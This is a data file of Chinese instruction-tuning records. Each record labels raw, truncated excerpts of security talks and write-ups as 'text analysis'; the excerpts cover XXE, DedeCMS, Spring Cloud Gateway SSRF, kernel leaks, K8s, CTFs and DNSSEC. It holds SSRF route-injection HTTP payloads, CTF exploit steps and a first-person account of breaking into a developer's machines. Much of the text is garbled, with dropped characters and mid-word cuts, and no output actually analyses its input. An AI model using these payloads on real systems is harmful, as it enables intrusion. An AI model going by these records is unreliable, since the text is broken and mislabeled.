这个地方是个大坑如果没有给对正确的域环境的域名那么在下一步就不会触发漏洞接着看 通过重组modData最终交由 com.adventnet.sym.adsm.auditing.server.ProcessMonitor#process 处理 process函数会获取domainName对应的键值来迭代最终调用addEventRows如果你的传参 DomainName为空那么这个地方进入不了迭代循环就触发不了漏洞 跟进addEventRows addEventRows会根据传入的CategoryId参数来获取不同的Listener然后分发进入getEventRowList函 数 其中listener有很多id为11的时候刚好是ProcessTrackingListener 接着走进 com.adventnet.sym.adsm.auditing.server.category.ProcessTrackingListener#getEventRow parseTaskContent到xxe的点 串联 有了xxe之后需要了解一个jdk的老版本xxe trick 这是2013年的议题 https://2013.appsecusa.org/2013/wp-content/uploads/2013/12/WhatYouDidntKnowAboutXXEAtta cks.pdf 在这个议题中提到通过xxe我们可以上传文件和列举目录jdk8u131之后的修复commit在这里 可以使用这个ftp服务器来使文件驻留到目标服务器中 https://g", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#BHUSA @BlackHatEvents ELF Section Docking Revisiting Stageless Payload Delivery Dimitry Snezhkov, X-Force, IBM Corporation #BHUSA @BlackHatEvents Information Classification: General Who -m Dimitry Snezhkov, X-Force, IBM Corporation  Research (Offense / Defense)  Tooling Support #BHUSA @BlackHatEvents Information Classification: General Goals  Overview of static payload bundling mechanisms in Linux.  Evolution of static payload embedding.  Improving viability of static payloads in delivery.  Binary compatibility of ELF sections as a unit of payload.  ELF section docking: Payload attachment factory at adversarial sites.  Detection, evasion successes and pitfalls of the docking approach  ELFPack PoC demo #BHUSA @BlackHatEvents Information Classification: General Payload Delivery Dynamic Static  Generated at runtime  Fetched at runtime from external (to loader) source + Light(er) loader + Less chance of detection due to absence of embedded payload + More flexibility - More chance of detection with use - More exposed loading mechanism - More moving parts - More detonation dependencies (environment). - Long haul activation / dormancy issues.  Bundled with delivery mechanisms  Time-released + Less chances of detection due to close coupled variance + Less detonation dependencies (environment) + Less moving parts + Better activation / dormancy once deployed - Heavier close coupled loader, greater size - More chance of detection due to embedded payload - Less flexibility (runtime awareness and variance) Iits a dial  #BHUSA @BlackHatEvents Information Classification: General Payload Delivery Dynamic Static  Empirically, more prevalent (short and long haul): 1. Deploy stager 2. Fetch payload 3. Load payload (maybe, on itself) 4. Maybe delete stager  Empirically, less widespread in long haul implants  Time-released 1. Deploy the bundle (maybe, on itself) Can we improve Static delivery Dynamic is well understood #BHUSA @BlackHatEvents Information Classification: General Payload ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n对某 DedeCMS 二开系统全局变量追加漏洞 利用 本文纯属虚构网站皆为本地靶场 我写文章总是喜欢带着我的个人感情去记录我尝试过的失败和踩过的坑最开始写文章都是为了自己 日后方便想起更多的细节和当时脑子里的想法所以总是那么的啰啰嗦嗦嫌长的可以直接看 进入后台 部分 起因 无意中发现某个违法网站所使用的程序在某些细节处很像 DedeCMS 但又不完全一样推测出有可能 是自研发或基于 DedeCMS 二开的感觉有搞头于是通过 fofa 搜索相关指纹和 ico 得到将近十个 来个类似的站点并发现了目标的测试站通过其他站分析得出是 XX公司 基于 DedeCMS 删减后的程 序于是围绕这十来个站打了一晚上的旁站就为了能搞到一份源码从无关紧要的同程序旁站一直打 到开发公司的禅道拿了好几台机器不是没找到就是源码不完整一直没搞到一份完整的源码最终在 禅道中发现了开发公司给客户使用的域名并通过历史解析记录查到一批之前没有找到的站最终使用 这些站自身的域名做字典扫描备份获取到了一份在用的完整的源码于是就有了这段繁琐的审计与漏 洞利用过程感觉很有意思利用也很麻烦所以打算记录一遍 正文 拿到源码后大概看了一眼开始有点绝望 90% 的源码基本都是 DedeCMS 原始的他们改动最大的 地方就是后台...并且他还把 DedeCMS 重要的 data 目录移到 web 目录外面去了并且连 /plus 文 件夹下的文件基本都删光了这导致很多重要的信息和漏洞根本无法通过 web 获取和利用 查看 DedeCMS 的版本文件确认最后一次升级时间为 20180109 对应的版本为 DEDECMS-V5.7-UTF8- SP2 此版本在我印象中出过很多洞但通过搜索引擎检索该版本历史漏洞发现基本都是要开启会员 或者进入后台才能利用一些前台的洞这套程序直接连文件都删掉了根本无法利用不过好在发现他 们的后台是固定的不像原生的 DedeCMS 一样喜欢要求站长换地址并且还存在两个后台 一个是 admin@@ (这个是我编的) 这个是织梦原始的后台 另一个是 adminxx (这个也是我编的) 这个是他们自己写的后台 很幸运测试发现几乎所有站和目标站都没有修改后台地址不存在 DedeCMS 找后台难的问题 前面测了那么多历史漏洞都不存在所以只能从代码入手看能不能挖个洞出来用了 那接下来的要做的事情无非就是 1. 找前台 RCE  从他们改动过的代码中看能不能找一个 RCE 出来 2. 找前台注入 DedeCMS 历史中出过很多注入他们改过的地方有可能会存在注入 3. 放弃审计直接去爆破目标测试站后台密码日下来后挂探针抓密码拿到密码再去打生产站 很显然我肯定优先尝试第一第二个思路把源码拖进去法师的代码审计工具里跑一遍扫出 1458 个可 疑漏洞心中暗喜但一路看下来发现 60% 的问题都在两个后台 40% 是 DedeCMS 框架的问题前 台能访问的基本都是误报他们自己写的代码全都在后台  前台展示的调用的全部都是 DedeCMS 自 己原生的代码 来给我解释解释什么叫惊喜这也能叫二开这简直就只是换了个 HTML 模板也好意思把前台对外 所有的 DedeCMS 标识都换成自己的 XXcms 冒充自己公司研发的程序[摊手] 放弃 1.0 闹归闹即使代码就是原生的我的目标也还得接着打只能硬着头皮审了看了很久的代码毫无头 绪又回去看以前爆出的历史用漏洞最终在一篇看了千八百遍最早发布于 2016年6月 实际有可能跟 早的文章中 ( DedeCMS最新版本修改任意管理员漏洞+getshell+exp 有兴趣的可以百度一堆) 发现作者 写的一句话 瞬间来劲了看了一下作者当时所贴出的漏洞代码定位到相关文件( /include/dedesql.class.php ) 发现代码一模一样 但由于找不到原始出处所以不确定当时所说的最新版是什么版本并且作者给出的添加用户的 EXP 所触发的文件( /plus/download.php )我手里这套程序直接把文件给删掉了 /plus 文件夹中只有五 个文件... 看了一眼代码发现只有四个文件在调用链中包含了上面的漏洞文件但按照逻辑这四个文件 也应该受影响抱着试试看的态度拿着作者的 EXP 打了一下 /plus/search.php 结果提示了 DedeCMS 经典的注入拦截信息 这明显是生效了只不过被 DedeCMS 自带的检测函数给拦截了继续跟代码发现 /plus/search.php 和他的类文件 /include/arc.searchview.class.php , 所有 SQL 查询均使用了 ExecuteNoneQuery 函数而 ExecuteNoneQuery 函数执行 SQL 语句前会被检测防注入 CheckSql 函数很长截取部分规则", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n如何在3个月发现12个内 核信息泄露漏洞 陈唐晖 李龙 百度安全实验室 2019 目录 0. 我是谁 1. 认识漏洞 2. 研究漏洞  堆栈数据污染  检测漏洞技术  CVE实例分析 3. 成果 4. 总结和思考 我是谁  百度安全实验室资深安全研发工程师  百度杀毒卫士主防设计者和负责人  十多年的windows内核研究和开发经验  深谙Rootkit技术内功深厚剑法独到  偶然涉入漏洞挖掘领域 Tanghui Chen chenhui00530@163.com 什么是内核信息泄露漏洞 Windows内核存在很多信息泄露漏洞可能导致绕过KASLR或系统关 键信息泄露攻击者可以利用它们得到一些重要信息比如  加密密钥  内核对象  关键模块地址   漏洞是如何产生的 如CVE-2018-8443 1. 用户态调用ZwDeviceIoControlFile (..., 0x7d008004, Output,); 2. ZwDeviceIoControlFile经过系统调用进入内核 3. 返回用户态后Output包含内核栈中未初始化的数据 现有的挖掘技术  BochsPwn  CPU指令模拟  DigTool  重量级VT技术  插桩   挖掘信息泄露漏洞的方法 第1步堆/栈数据污染方法  Hook KiFastCallEntry内核栈污染  Hook ExAllocatePoolWithTag内核堆污染  对堆和栈的内存数据填充特殊标志数据如AA等 在Hook KiFastCallEntry中通过IoGetStackLimits获取内核栈内存填充特殊标志数据 IoGetStackLimits(&LowLimit, &HighLimit); __asm{ xor eax, eax; mov al, g_cFlags; //0xAA mov edi, LowLimit; mov ecx, Esp_Value; sub ecx, LowLimit; cld; rep stosb; } 栈的污染 在调用ExAllocatePoolWithTag分配内存时填充特殊标志数据 PVOID NTAPI HOOK_ExAllocatePoolWithTag(...) { PVOID Buffer = NULL; Buffer = pfn_ExAllocatePoolWithTag(PoolType, NumberOfBytes, Tag); if (Buffer){ memset(Buffer, g_cFlags, NumberOfBytes); //将内存初始化特殊数据如0xAA } return Buffer; } 堆的污染 堆栈数据污染的思考  堆和栈数据污染技术相对简单并不存在方法优劣  内存中可能存在和污染标记相同的数据有误报的可能性  采用随机污染标记减少误报 第2步数据检测技术研究 目前已经有基于CPU指令模拟VT等数据检测技术 那是否还有更简捷的方法呢 数据检测技术研究 经过探索我们提出了三种新的用于数据检测技术  Nirvana首次应用于内核信息泄露漏洞挖掘  memcpy/memmove后称memcpy最轻量级的方法  movsd Nirvana是Microsoft提供的一个轻量级的动态translation框架可用于监视和控制正在运行的进 程的执行而无需重新编译或构建进程中的任何代码 from Hooking Nirvana@Alex Ionescu首次被我们应用于内核信息泄露漏洞挖掘 通过Nirvana可设置系统调用返回到用户态时的回调函数在回调函数中能够检测栈数据 ZwSetInformationProcess(NtCurrentProcess(),ProcessInstrumentationCallback,&Info64,size of(Info64)); typedef struct _PROCESS_INSTRUMENTATION_CALLBACK_INFORMATION{ ULONG_PTR Version; ULONG_PTR Reserved; ULONG_PTR Callback; }PROCESS_INSTRUMENTATION_CALLBACK_INFORMATION; Nirvana概述 __declspec (naked) VOID InstrumentationCallback() { __asm{ //代码有省略... mov eax, fs:[0x8]; mov edi, fs:[0x4]; cmp dword ptr[eax], g_cFlag; //如0xAAAAAAAA jz __find; add eax, 4; cmp eax, edi; //代码有省略... jmp dword ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 34C3 CTF 2017 Team: Eternal, rev, msm, nazywam, psrok1, c7f.m0d3, akrasuski1, shalom ### Table of contents * [Software update (crypto)](crypto_software_update) * [lol (crypto)](crypto_lol) * [blinkenlights (re)](blinkenlights)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n访问地址直接给出了源码: http://101.32.205.189 <?php class ip { public $ip; public function waf($info){ } public function __construct() { if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ $this->ip = $this->waf($_SERVER['HTTP_X_FORWARDED_FOR']); }else{ $this->ip =$_SERVER[\"REMOTE_ADDR\"]; } } public function __toString(){ $con=mysqli_connect(\"localhost\",\"root\",\"********\",\"n1ctf_websign\"); $sqlquery=sprintf(\"INSERT into n1ip(`ip`,`time`) VALUES ('%s','%s')\",$this->waf($_SERVER['HTTP_X_FORWARDED_FOR']),time()); if(!mysqli_query($con,$sqlquery)){ return mysqli_error($con); }else{ return \"your ip looks ok!\"; } mysqli_close($con); } } class flag { public $ip; public $check; public function __construct($ip) { $this->ip = $ip; } public function getflag(){ if(md5($this->check)===md5(\"key****************\")){ readfile('/flag'); } return $this->ip; } public function __wakeup(){ if(stristr($this->ip, \"n1ctf\")!==False) $this->ip = \"welcome to n1ctf2020\"; else $this->ip = \"noip\"; } public function __destruct() { echo $this->getflag(); } } if(isset($_GET['input'])){ $input = $_GET['input']; unserialize($input); } 粗略一看源码里 unserialize($input)的大字告诉我们是需要控制传入 input 参数的 反序列化数据来进行一些条件的满足从而来获得 flag public function getflag(){ if(md5($this->check)===md5(\"key****************\")){ readfile('/flag'); } return $this->ip; } 最终达成的目的很明显就是运行 flag 类里的 getflag()方法通过 readfile 来获得 flag 文 件  而 想 要 运 行 此 方 法 就 要 满 足 条 件 md5($this->check)===md5(\"key****************\")并且 key 我们是不知道的看起 来也没有办法控制可以控制的话还可以通过传入数组让两边 md5 函数来返回 null 来 进行条件满足所以我们需要知道这个 key 的值 public function __toString(){ $con=mysqli_connect(\"localhost\",\"root\",\"********\",\"n1ctf_websign\"); $sqlquery=sprintf(\"INSERT into n1ip(`ip`,`time`) VALUES ('%s','%s')\",$this->waf($_SERVER['HTTP_X_FORWARDED_FOR']),time()); if(!mysqli_query($con,$sqlquery)){ return mysqli_error($con); }else{ return \"your ip looks ok!\"; } mysqli_close($con); } 然后很自然的将目光投放到上面的 ip 类中看到此类获取了访问者 XFF 并插入表 中很自然的就想到了 xff 注入通过注入来获得 key来赋值 flag 类中的 check 变量 而此 mysql 语句放在__toString()中想要运行此函数就要满足一个对象被当做字符 串对待来", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n* [HR面](#hr面) * [问题](#问题) * [对我们公司有什么了解为什么选择本公司](#对我们公司有什么了解为什么选择本公司) * [为什么想要应聘这个职位](#为什么想要应聘这个职位) * [对安全服务是怎么理解的](#对安全服务是怎么理解的) * [如果我不知道渗透测试两分钟说一下](#如果我不知道渗透测试两分钟说一下) * [如果我是一个汽车厂商你如何证明你的工作是有意义的](#如果我是一个汽车厂商你如何证明你的工作是有意义的) * [作为应届生你如何能胜任该职位](#作为应届生你如何能胜任该职位) * [你有什么职业规划](#你有什么职业规划) * [如果离职的话是因为什么原因](#如果离职的话是因为什么原因) * [你有什么优缺点](#你有什么优缺点) * [对于薪资的要求](#对于薪资的要求) * [给不了这么多工资可以接受吗为什么想要这个数](#给不了这么多工资可以接受吗为什么想要这个数) * [进入部门后你需要多长时间进入项目](#进入部门后你需要多长时间进入项目) * [上一个面试的人能力跟你差不多但是工资方面比你要的低](#上一个面试的人能力跟你差不多但是工资方面比你要的低) * [是否可以接受加班](#是否可以接受加班) * [沟通能力和领导同事产生分歧会怎么办](#沟通能力和领导同事产生分歧会怎么办) * [工作一段时间后发现工作不是想象中的会怎么办/对跳槽的看法](#工作一段时间后发现工作不是想象中的会怎么办/对跳槽的看法) * [对上司有什么要求喜欢和什么样的领导合作](#对上司有什么要求喜欢和什么样的领导合作) * [最有影响的一件事/人](#最有影响的一件事人) * [你还要问什么问题](#你还要问什么问题) # HR面 注意HR面试的时候会有非常多的坑熟悉我在这里写的问题回答的时候情商高一点不要跟HR吵起来也不要有不合时宜的意见分歧这个度的把控最好自己能让同学朋友担任面试官让他们多多挑你的刺从而不断练习自己的反应能力技术面试通过的在HR这边通不过的例子是有很多的 ## 问题 ### 对我们公司有什么了解为什么选择本公司 在信息安全行业比较知名了解过公司的xx产品每次面试某个公司都要花5-10分钟了解该公司的产品 ### 为什么想要应聘这个职位 从我的经历上可以很清楚地看到我对网络安全的浓厚兴趣我认为对本职工作有兴趣的人才能更好地完成这个工作另外也有一句话说得很棒你之所以看不见黑暗是因为有人拼命把它挡在你看不到的地方我认为做信息安全的尤其是渗透测试就是为了更好地保护用户的安全防患于未然也是我想要应聘这个岗位的理由不要照背体现自己的热爱和专业能力 ### 对安全服务是怎么理解的 安全服务对象是人 渗透测试对象是网站我的理解 - 安全概念和资讯 - 安全工具使用 - 渗透测试 - 安全基线检查 - 应急响应 - 代码审计 - 安全边界建设 - 安全规范 ### 如果我不知道渗透测试两分钟说一下 此处自行组织语言力求能将渗透测试讲得浅显易懂时间控制在三分钟以内 ### 如果我是一个汽车厂商你如何证明你的工作是有意义的 对于不懂得安全的人来说怎么能说服他需要进行渗透测试渗透测试有什么作用 ### 作为应届生你如何能胜任该职位 正如前方所说我学习能力很强主观能动性强能很快地做好下派的任务所以我认为我能很好地胜任这个职位 ### 你有什么职业规划 渗透测试工程师->渗透测试项目负责人->安全架构师安全咨询顾问 ### 如果离职的话是因为什么原因 个人规划和公司有冲突缺少上升空间就算是因为钱少和同事 <del>打架</del> 不和也不要明说 ### 你有什么优缺点 - 优点对网络安全十分热爱抗压能力强学习能力强责任感强 - 缺点遇到技术难点时可能会一直钻研可能会耽搁到其它事情 情商高一点不要真的说自己的缺点 ### 对于薪资的要求 月薪13-15K可以接受1k的浮动 ### 给不了这么多工资可以接受吗为什么想要这个数 1. 贵公司和我其实比较契合我可以接受月薪1k左右的浮动表明自己的接受范围和立场 2. 可能我某些方面表现得不够好或者表达不清晰让您觉得我的能力不够您可以根据这些点再问我几个问题表明自己对自身的判断认为自己值得这个数委婉提示面试官可能判断有误 3. 通过贵司的招聘信息和整个市场平均水平看我认为我岗位匹配度比较好值得这个工资水平明确回答要有自信 这个问题千万不要顶嘴或拍桌走人可参考我的知乎回答 面试想拿 10KHR 说你只值 7K该怎样回答或者反驳 - 李与归的回答 - 知乎 https://www.zhihu.com/question/282880854/answer/432987673  ### 进入部门后你需要多长时间进入项目 表达自己的快速学习能力 ### 上一个面试的人能力", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n从SSRF 到 RCE  对 Spring Cloud Gateway RCE漏洞的分析 0x01 写在前 本周3.1的时候Spring官发布了 Spring Cloud Gateway CVE 报告 其中编号为 CVE-2022-22947 Spring Cloud Gateway 代码注漏洞的严重性为危急周三周四的时候就有不少圈 内的朋友发了分析和复现过程由于在作和写论就直没去跟踪看看周末抽了点时间对这个漏洞进复现 分析了下还是挺有意思的 0x02 从SSRF说起 看到这个漏洞利流程的时候就有种熟悉的既视感回去翻了翻陈师傅的星球果然 去年12的时候陈师傅提了个 actuator gateway 的 SSRF漏洞这个漏洞来 wya 作者在章中提到通过Spring Cloud Gateway 执器actuator提供的管理功能就可以对路由进添加删 除等操作 因此作者利 actuator 提供的路由添加功能并根据官示例如下图 添加了个路由 POST /actuator/gateway/routes/new_route HTTP/1.1 Host: 127.0.0.1:9000 Connection: close Content-Type: application/json { \"predicates\": [ { \"name\": \"Path\", \"args\": { \"_genkey_0\": \"/new_route/**\" 在执 refresh 操作后作者成功执了个SSRF请求向https://wya.pl/index.php发起的请求 陈师傅最后还在星球给了个演示的实例https://github.com/API-Security/APISandbox/blob/main/OASystem/ README.md 先不具体讨论为什么payload会这样写如果你熟悉 CVE-2022-22947 的payload那么看到这你定会有同样 的熟悉感 是的CVE-2022-22947 这个漏洞实际上就是这个 SSRF 的进阶版并且触发SSRF的原理并不复杂 先利 /actuator/gateway/routes/{new route} 的式指定个URL地址并针对该地址添加个路由 } } ], \"filters\": [ { \"name\": \"RewritePath\", \"args\": { \"_genkey_0\": \"/new_route(?<path>.*)\", \"_genkey_1\": \"/${path}\" } } ], \"uri\": \"https://wya.pl\", \"order\": 0 } POST /actuator/gateway/routes/new_route HTTP/1.1 Host: 127.0.0.1:8080 Connection: close Content-Type: application/json { \"predicates\": [ { \"name\": \"Path\", \"args\": { \"_genkey_0\": \"/new_route/**\" } } ], \"filters\": [ { \"name\": \"RewritePath\", \"args\": { \"_genkey_0\": \"/new_route(?<path>.*)\", \"_genkey_1\": \"/${path}\" 然后刷新令这个路由效 最后直接访问 /new_route/index.php 即可触发SSRF漏洞 到这有两个问题第payload为什么会这样写第整个请求流程是什么样的 先来看第个问题payload为什么会这样写 上中我们提到了Spring Cloud Gateway官给的实例如下 这实例对下SSRF的payload我们可以发现在SSRF的payload中多了对过滤器filters的具体定义 纵观整个payload实际上可以发现其就是个动态路由的配置过程 } } ], \"uri\": \"https://www.cnpanda.net\", \"order\": 0 } POST /actuator/gateway/routes/new_route HTTP/1.1 Host: 127.0.0.1:8080 Connection: close Content-Type: application/json { \"predicate\": \"Paths: [/new_route], match trailing slash: true\", \"route_id\": \"new_route\", \"filters\": [ \"[[RewritePath /new_route(?<path>.*) = /${path}], order = 1]\" ], \"uri\":", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPROXY PRANK-O-MATIC starring charlie vedaa, ccie #7502 and anonymous speaker A messAGE fROM Jules A messAGE fROM Jules If youre easily offended A messAGE fROM Jules If youre easily offended now would be a good time to go fuck yourself. A messAGE fROM Jules If youre easily offended now would be a good time to go fuck yourself. Seriously, fuck off. A Message From Jules If youre easily offended now would be a good time to go fuck yourself. Seriously, fuck off. Fucking asshole. ciscostu network architect FBIs CJIS Division founder PacketProtector.org anonymous speaker has skills Who are we? Shameless SALES PITCH Whats the point of this? Sounds interesting... Sounds interesting... the TIME MACHINE Its on, bitches the all-porn internet Prepare to be woo-ed the Tourette-net MOTHERFUCKER Come and get it http://prank-o-matic.com the time machine proxy.prank-o-matic.com:8000 the all-porn internet proxy.prank-o-matic.com:8001 the tourette-net proxy.prank-o-matic.com:8002 Brainstorming Props Pete Stevens (Upside-Down- Ternet) DEFCON staff Squid the entire open source community", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n10505 Judicial Drive, Suite 201 | Fairfax, VA 22030 | V: 703.352.2982 | F: 203.286.2533 | sales@kryptowire.com Vulnerable Out of the Box: An Evaluation of Android Carrier Devices Abstract Pre-installed apps and firmware pose a risk due to vulnerabilities that can be pre-positioned on a device, rendering the device vulnerable on purchase. To quantify the exposure of the Android end-users to vulnerabilities residing within pre-installed apps and firmware, we analyzed a wide range of Android vendors and carriers using devices spanning from low-end to flagship. Our primary focus was exposing pre-positioned threats on Android devices sold by United States (US) carriers, although our results affect devices worldwide. We will provide details of vulnerabilities in devices from all four major US carriers, as well two smaller US carriers, among others. The vulnerabilities we discovered on devices offered by the major US carriers are the following: arbitrary command execution as the system user, obtaining the modem logs and logcat logs, wiping all user data from a device (i.e., factory reset), reading and modifying a users text messages, sending arbitrary text messages, getting the phone numbers of the users contacts, and more. All of the aforementioned capabilities are obtained outside of the normal Android permission model. Including both locked and unlocked devices, we provide details for 38 unique vulnerabilities affecting 25 Android devices with 11 of them being sold by US carriers. 1. Introduction Android devices contain pre-installed apps ranging from a vendors custom Settings app to bloatware. Bloatware can frustrate users due to the difficulty in removing or disabling these potentially unwanted apps. In some cases, a user needs to root their device to remove the offending software (assuming there is a viable root strategy available), potentially voiding their warranty. Pre-installed apps may contain vulnerabilities, exposing the end-user to risks that they cannot easi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: CVE-2018-1002105 提权漏洞 --- <center><h1>K8s 提权漏洞 CVE-2018-1002105 学习</h1></center> --- > 以下内容为自己个人的学习笔记因此内容不会多么详实其中有些内容也许会存在错误如有错误欢迎留言处指出还望谅解 ## 0x00 前言 CVE-2018-1002105 是一个 k8s 提权漏洞该漏洞允许攻击者在拥有 pod 权限的情况下提升至 API Server 权限当拥有 API Server 权限后也就不难逃逸到宿主机了 该漏洞的 CVSS 3.x 评分为 9.8 分受影响版本如下 Kubernetes v1.0.x-1.9.x Kubernetes v1.10.0-1.10.10 (fixed in v1.10.11) Kubernetes v1.11.0-1.11.4 (fixed in v1.11.5) Kubernetes v1.12.0-1.12.2 (fixed in v1.12.3) 在开始学习该漏洞之前需要先了解一下 WebSocketWebSocket 是一种网络传输协议位于 OSI 模型的应用层和 HTTP 协议一样依赖于传输层的 TCP 协议 为了实现和 HTTP 的兼容性WebSocket 握手使用 HTTP 的 Upgrade 头即表示从 HTTP 协议改成 WebSocket 协议以下是一个简单的 WebSocket 握手请求 客户端请求 ``` GET /chat HTTP/1.1 Host: server.example.com Upgrade: websocket Connection: Upgrade Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ== Origin: http://example.com Sec-WebSocket-Protocol: chat, superchat Sec-WebSocket-Version: 13 ``` 服务端响应 ``` HTTP/1.1 101 Switching Protocols Upgrade: websocket Connection: Upgrade Sec-WebSocket-Accept: s3pPLMBiTxaQ9kYGzzhZRbK+xOo= Sec-WebSocket-Protocol: chat ``` 在客户端的请求中`Connection: Upgrade` 表示客户端希望升级协议`Upgrade: WebSocket` 表示希望升级到 WebSocket 协议 ## 0x01 漏洞分析 这里以 k8s v1.11.1 版本为例代码地址https://github.com/kubernetes/kubernetes/archive/refs/tags/v1.11.1.tar.gz 在进行漏洞分析之前可以先通过下图去了解一下客户端向 pod 执行命令的流程 <img width=\"1000\" src=\"/img/1649994371.png\"> 通过这张图不难看出当客户端向 Node 节点里的 Pod 发送指令时会先经过 API Server再到 KubeletCVE-2018-1002105 漏洞也是存在于这个流程中下面先来看看 API Server 的代码再看看 Kubelet 的代码 ### API Server 代码分析 先找到 staging/src/k8s.io/apimachinery/pkg/util/proxy/upgradeaware.go 文件upgradeaware.go 用来处理 API Server 的代理逻辑在 upgradeaware.go 的 185 行有个 ServerHTTP 函数 <img width=\"1000\" src=\"/img/1649994385.png\"> 在 187 行可以看到ServerHTTP 函数调用了 tryUpgrade 函数漏洞就存在于这个函数中该函数位于 upgradeaware.go 的第 236行下面就来分析一下这个函数 <img width=\"1000\" src=\"/img/1649994397.png\"> 在 tryUpgrade 函数中首先调用了 IsUpgradeRequest 函数 IsUpgradeRequest 函数会判断 HTTP 的请求包中是否存在`Connection: Upgrade`即判断该请求是否想要升级如果存在就会返回 True <img width=\"1000\" src=\"/img/1649994407.png\"> 接着回到刚才的 tryUpgrade 函数在 tryUpgrade函数判断协议需要", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDNSSECTION @ DEF CON 28 SAFE MODE 6 Aug 2020 1 / 40 DNSSECTION Hadrien Barral  Rémi Géraud-Stewart  Amaury Barral David Naccache École normale supérieure @ PSL University / QPSI @ Qualcomm Technologies Inc. What is this about  An e-mail privacy breach in the largest French cloud provider  The first practical attack based on DNSSEC zone walking  A cautionary tale about hash functions DNSSECTION @ DEF CON 28 SAFE MODE 6 Aug 2020 2 / 40 Why this matters  DNS is everywhere, tons of potentially interesting data  Zone walking has never been demonstrated in the wild before DNSSECTION @ DEF CON 28 SAFE MODE 6 Aug 2020 3 / 40 Who we are  Hadrien Barral Ecole Normale Supérieure / PSL University  Rémi Géraud-Stewart, Ph.D, ENS/PSL, QPSI @ Qualcomm  This is our second Defcon talk! Done in collaboration with Amaury Barral and David Naccache. DNSSECTION @ DEF CON 28 SAFE MODE 6 Aug 2020 4 / 40 1. Whos behind skytalks-vidz.com? DNSSECTION @ DEF CON 28 SAFE MODE 6 Aug 2020 5 / 40 DNS 101 DNS: Domain Name System  Naming system for remote resources  Distributed database system (NOT a blockchain ffs)  Contains Resource Records (RR) and domain names  Resolver: figures out the translation of a domain name into an IP address  Zones: subtrees maintained by different people DNSSECTION @ DEF CON 28 SAFE MODE 6 Aug 2020 6 / 40 Registrars and domain services 101 Scenario: you want to create a new website:  Buy a computer  Pay for Internet access  Pay someone to design a fancy website running on your server  Pay a registrar to get the domain name you want  Pay someone to run DNS servers that connect the domain name to your servers IP  Pay someone to maintain all of this All-in-one: cloud hosting! DNSSECTION @ DEF CON 28 SAFE MODE 6 Aug 2020 7 / 40 OVHcloud 101 OVHcloud  Largest French cloud provider (2nd in Europe)  They also sell domains  And e-mail redirects with that (and they host Wikileaks since 2010, just fyi) DNSSECTION @ DEF CON 28 SAFE MODE 6 Aug 2020 8 / 40 E-mail redirects at OVHcloud", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# b00tl3gRSA2 Cryptography, 400 points ## Description: > In RSA d is alot bigger than e, why dont we use d to encrypt instead of e? ## Solution: This challenge is similar to last year's [Super Safe RSA 2](/2018_picoCTF/Super%20Safe%20RSA%202.md). Let's connect to the attached service: ```console root@kali:/media/sf_CTFs/pico/b00tl3gRSA2# nc 2019shell1.picoctf.com 25894 c: 48071375616862534228176326528574885516709202280728491624113945638793071184006980266737279850050742118693709792242840439393541865811330474576169967674079123907090654398992126304860965521240238310796011949309914300123384015445484300373166609628216518116939428644164267538696119210897669664957903314187967291512 n: 92127679145864665544509285250839264498411738443717215748267905745029643874193055919184223323864056258655815094323958810858139536866236939854310538894340791381299415997654040768206426802287455505544556235998728826483952449687792000885283330274926207244242183386994582748534826366816341614902994131107305595311 e: 57162823211124109429817134983904174001913650793831222991402812445120854456264193141243988239339731505897127805599729329763879733999552297514925671812861027407779381128169655277743189409738606387376548984511780696518013594272105582951800971729070004788190602897517208334073609575019514843888968859835457405377 ``` We see that `e` is very large, and the description suggests that `d` is much smaller (i.e. `d` and `e` were swapped). The following two posts summarize why this is a bad idea: * [RSA: Does it matter if you use e or d to encrypt?](https://crypto.stackexchange.com/questions/54557/rsa-does-it-matter-if-you-use-e-or-d-to-encrypt) * [Why RSA uses {d,n} as private key instead of {e,n}?](https://crypto.stackexchange.com/questions/8460/why-rsa-uses-d-n-as-private-key-instead-of-e-n) In short, if the secret exponent (usually denoted as `d`) is small, it is vulnerable to Wiener's attack. We'll use `RsaCtfTool` to trigger the attack. First, we create a PKCS#8 Public Key file from `e` and `n", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWe are Legion: Pentesting with an Army of Low-power Low-cost Devices Philip Polstra Hacker in Residence University of <Redacted> @ppolstra http://polstra.org What is this talk about?  Hacking and/or forensics with small, low-power devices  ARM-based Beagleboard & Beaglebone running full suite of security/forensics tools  Porting tools to a new platform  Performing coordinated attacks with networks of devices Who am I?  Professor & Hacker in Residence at private Midwestern university  Programming from age 8  Hacking hardware from age 12  Also known to fly and build airplanes Roadmap  Choosing a platform  Selecting a base OS  Building a base system  The easy part  leveraging repositories  The slightly harder part  building tools  Building your own accessories  Solo Demonstrations  Networking with 802.15.4  Attack Networks  Future directions Choosing a Platform  Small  Low-power  Affordable  Mature  Networking built in  Good USB support  Convenient input and output And the Winning Platform is...  Beagleboard-xM/BeagleBone Black  3.25 square/ 3.4 x 2.1  <10 Watts  Only $149 / $45  Based on Cortex A8  512MB RAM  100 Mbps Ethernet built in  4/1 high-speed USB plus USB-on-the-go  